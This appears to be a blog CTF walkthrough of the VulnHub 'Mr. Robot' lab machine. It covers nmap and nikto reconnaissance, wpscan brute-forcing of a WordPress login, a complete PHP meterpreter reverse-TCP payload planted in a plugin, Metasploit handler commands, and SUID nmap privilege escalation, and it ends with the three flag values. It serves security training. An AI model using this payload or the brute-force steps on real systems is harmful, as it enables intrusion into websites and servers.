Mr. Robot – VulnHub

In this CTF write up I am going to give you a walk through of “Mr. Robot” which is a vulnerable machine designed for security enthusiasts to increase their vulnerability assessment and penetration skills.
You can download this machine from Vulnhub link provided.

Level: Intermediate

Objective:Find three hidden keys.

WalkThrough:

1. Start with the nmap 10.10.10.11

We get some important information from nmap results.
3 open ports and Apache server running.

Now lets use nikto to enumerate web services.


2. nikto -h 10.10.10.11

Nikto gave us some interesting information like robot.txt and WP installation.


3. Now lets open robots.txt

Lets Open key-1-of-3.txt

Now lets check what’s in fsocity.dic
root@kali:~# wget http://10.10.10.11/fsocity.dic
–2019-01-02 00:19:39–  http://10.10.10.11/fsocity.dic
Connecting to 10.10.10.11:80… connected.
HTTP request sent, awaiting response… 200 OK
Length: 7245381 (6.9M) [text/x-c]
Saving to: ‘fsocity.dic’
fsocity.dic               100%[====================================>]   6.91M  –.-KB/s    in 0.1s
2019-01-02 00:19:39 (47.7 MB/s) – ‘fsocity.dic’ saved [7245381/7245381]
It seems to be a wordlist.


4. Now, It’s time check WordPress site and try to login.
I tried multiple common combinations like admin-admin, root-root etc.
As i know about the TV Series Mr. Robot and it’s lead character Elliot. I tried elliot-elliot as credentials and Bingo!
I got ERROR: The password you entered for the username elliot is incorrect.
Now let’s clean fsocity.dic wordlist and use WP Scan to brute-force it using fsocity_cleaned.txt wordlist
root@kali:~# cat fsocity.dic | sort | uniq > fsocity_cleaned.txt
root@kali:~# wpscan –url http://10.10.10.11/ –wordlist /root/fsocity_cleaned.txt –username elliot


5. Login using the creds and upload a payload to get revese_tcp

root@kali:~# msfvenom -p php/meterpreter/reverse_tcp lhost=10.10.10.5 lport=4444 -f raw
No platform was selected, choosing Msf::Module::Platform::PHP from the payload
No Arch selected, selecting Arch: php from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 946 bytes
/*<?php /**/ error_reporting(0); $ip = ‘10.10.10.5’; $port = 4444; if (($f = ‘stream_socket_client’) && is_callable($f)) { $s = $f(“tcp://{$ip}:{$port}”); $s_type = ‘stream’; } elseif (($f = ‘fsockopen’) && is_callable($f)) { $s = $f($ip, $port); $s_type = ‘stream’; } elseif (($f = ‘socket_create’) && is_callable($f)) { $s = $f(AF_INET, SOCK_STREAM, SOL_TCP); $res = @socket_connect($s, $ip, $port); if (!$res) { die(); } $s_type = ‘socket’; } else { die(‘no socket funcs’); } if (!$s) { die(‘no socket’); } switch ($s_type) { case ‘stream’: $len = fread($s, 4); break; case ‘socket’: $len = socket_read($s, 4); break; } if (!$len) { die(); } $a = unpack(“Nlen”, $len); $len = $a[‘len’]; $b = ”; while (strlen($b) < $len) { switch ($s_type) { case ‘stream’: $b .= fread($s, $len-strlen($b)); break; case ‘socket’: $b .= socket_read($s, $len-strlen($b)); break; } } $GLOBALS[‘msgsock’] = $s; $GLOBALS[‘msgsock_type’] = $s_type; eval($b); die();

Copy this payload in any editable plugin.


6. Open Msf Console
msf >
msf > use exploit/multi/handler
msf exploit(handler) > set payload php/meterpreter/reverse_tcp
payload => php/meterpreter/reverse_tcp
msf exploit(handler) > set lhost 10.10.10.5
lhost => 10.10.10.5
msf exploit(handler) > set lport 4444
lport => 4444
msf exploit(handler) > exploit


7. Activate the plugin in which you uploaded the payload.

[*] Started reverse TCP handler on 10.10.10.5:4444
[*] Starting the payload handler…
[*] Sending stage (33721 bytes) to 10.10.10.11
[*] Meterpreter session 1 opened (10.10.10.5:4444 -> 10.10.10.11:44555) at 2019-01-02 02:00:51 -0500

Now we got the md5 hash and upon checking it online we got “abcdefghijklmnopqrstuvwxyz

To get the terminal type: python -c ‘import pty; pty.spawn(“/bin/bash”)’


8. Now we have to get root to get 3rd key
For this type command
robot@linux:~$ find / -user root -perm -4000
find / -user root -perm -4000
/bin/ping
/bin/umount
/bin/su
find: `/etc/ssl/private’: Permission denied
/usr/bin/passwd
/usr/bin/gpasswd
/usr/local/bin/nmap
/usr/lib/openssh/ssh-keysign
/usr/lib/eject/dmcrypt-get-device
find: `/opt/bitnami/mysql/data/mysql’: Permission denied

It lists out nmap and we can use interactive shell for nmap.

Finally we were able to achieve all 3 keys:
Key 1: 073403c8a58a1f80d943455fb30724b9
Key 2: 822c73956184f694993bede3eb39f959
Key 3: 04787ddef27c3dee1ee161b21670b4e4

 

Leave a Reply

Your email address will not be published. Required fields are marked *

3 × five =